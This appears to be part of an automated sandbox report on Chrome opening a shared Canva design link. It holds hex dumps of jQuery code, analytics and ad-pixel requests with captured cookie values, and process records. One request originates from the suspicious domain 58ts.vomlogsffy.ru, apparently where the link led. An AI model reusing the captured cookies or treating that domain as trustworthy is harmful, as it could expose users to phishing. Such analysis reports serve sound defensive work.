                                                                                                                                                                                                                                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                                                                                    Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                                                                                    Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    112192.168.2.449871216.239.34.21443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC2226OUTGET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471z8812729902za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1734643647572&sst.ude=0&_s=1&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=Loaded%20a%20Page&_fv=1&_nsi=1&_ss=1&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_173464376514845&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=0&ep.custom_device_category [TRUNCATED]
                                                                                                                                                                                                                                                    Host: ct.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=iXUqyvIydFpwl7XXa9K64SvmeL%2F%2FMTji7nTeBo05Th040svWJMVFQljR3%2BPeFSp8S7dVUpgLEabZoNIEKBFboDK1Xd0NNCjJaZ42FWoKukmv91PXxcLdIeiajgv%2Fzg%3D%3D
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:59 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    set-cookie: FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; Max-Age=63072000; Domain=canva.com; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                    set-cookie: FPLC=MMgTeThf6AtNWnuW0bpA2gWgXGpk67lNZCYW0Tj0MXE6ttmiL5kGQkC8BWgIbjkyk9EBUQCHjNCPNNoVJDdEcv7TeTTHbd3e71penLcdb3D5jEbEb6TFAnJb2AbpsQ%3D%3D; Max-Age=72000; Domain=canva.com; Path=/; Secure
                                                                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC835INData Raw: 33 63 63 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 72 65 67 69 73 74 65 72 5f 63 6f 6e 76 65 72 73 69 6f 6e 3d 31 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 77 65 62 73 69 30 30 30 3b 63 61 74 3d 66 6c 6f 6f 64 30 3b 6f 72 64 3d 31 38 31 35 36 39 34 38 31 36 3b 67 74 6d 3d 34 35 6a 39 31 65 34 63 35 30 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 35 39 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d
                                                                                                                                                                                                                                                    Data Ascii: 3ccevent: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=1815694816;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC144INData Raw: 74 6d 5f 63 61 6d 70 61 69 67 6e 25 33 44 64 65 73 69 67 6e 73 68 61 72 65 25 32 36 75 74 6d 5f 6d 65 64 69 75 6d 25 33 44 6c 69 6e 6b 32 25 32 36 75 74 6d 5f 73 6f 75 72 63 65 25 33 44 75 6e 69 71 75 65 6c 69 6e 6b 73 25 32 36 75 74 6c 49 64 25 33 44 68 64 63 64 65 63 38 65 64 34 61 3f 22 5d 2c 22 6f 70 74 69 6f 6e 73 22 3a 7b 22 61 74 74 72 69 62 75 74 69 6f 6e 5f 72 65 70 6f 72 74 69 6e 67 22 3a 74 72 75 65 7d 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: tm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a?"],"options":{"attribution_reporting":true}}
                                                                                                                                                                                                                                                    2024-12-19 21:27:59 UTC929INData Raw: 33 39 61 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 77 65 62 73 69 30 30 30 3b 63 61 74 3d 66 6c 6f 6f 64 30 3b 6f 72 64 3d 31 38 31 35 36 39 34 38 31 36 3b 67 74 6d 3d 34 35 6a 39 31 65 34 63 35 30 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 35 39 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d 25 32 46 64 65 73 69 67 6e 25 32 46 64 65 73 69 67 6e 2d 69 64 25
                                                                                                                                                                                                                                                    Data Ascii: 39aevent: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=websi000;cat=flood0;ord=1815694816;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%
                                                                                                                                                                                                                                                    2024-12-19 21:28:19 UTC76INData Raw: 34 31 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 62 6f 64 79 22 3a 22 22 7d 7d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 41event: messagedata: {"response":{"status_code":200,"body":""}}0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    113192.168.2.44992735.190.80.1443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:28:34 UTC528OUTOPTIONS /report/v4?s=VdQy7dK9OHERkYeIuYcxkf5Sxwofb%2F09wBBuMXblGr7hh6WQvP6DTcJHhiGeFa9qrpzoNA7S30DXaBQBRkuHZc32M4kHls9rupv%2Fmfv7wUs5xd5hgXR9piDKSPDu3fg%3D HTTP/1.1
                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:28:35 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                                                                                    access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                    access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                                    date: Thu, 19 Dec 2024 21:28:34 GMT
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    114192.168.2.44992935.190.80.1443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:28:35 UTC537OUTOPTIONS /report/v4?s=JUh5Uu1BoG5vaCouqCly%2BofBAkcdcBFwc2CbvaaPYxf%2FZ37YSzvjchyrauCL98A0JzU8prtuVtk22j8vTx6Qg7B6CblmOnJ6hxrn3i0kObzkbsNhcDAE1vaikShx%2Fg%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Origin: https://58ts.vomlogsffy.ru
                                                                                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:28:35 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                                                                                    access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                    access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                    date: Thu, 19 Dec 2024 21:28:35 GMT
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    115192.168.2.44993035.190.80.1443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:28:35 UTC558OUTOPTIONS /report/v4?s=OnkqIIvZ8uoU23lRe%2FLxxMA88MTRd4GC5hKz%2FDyZ8QPhNqrx9ron%2FBbE%2FZ4dobtGwDvUJJYD43yOokXkut90R4dyTYDRZZnRkL60FqmY4rnu6kuAsp6%2BQ%2B296Kf6Lal9WwfpW0XNeA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Origin: https://font-public.canva.com
                                                                                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:28:35 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                                                                                    access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                    access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                    date: Thu, 19 Dec 2024 21:28:35 GMT
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:16:27:06
                                                                                                                                                                                                                                                    Start date:19/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                    Start time:16:27:09
                                                                                                                                                                                                                                                    Start date:19/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2028,i,9838712427235616250,10325020197917731917,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                    Start time:16:27:16
                                                                                                                                                                                                                                                    Start date:19/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a"
                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    No disassembly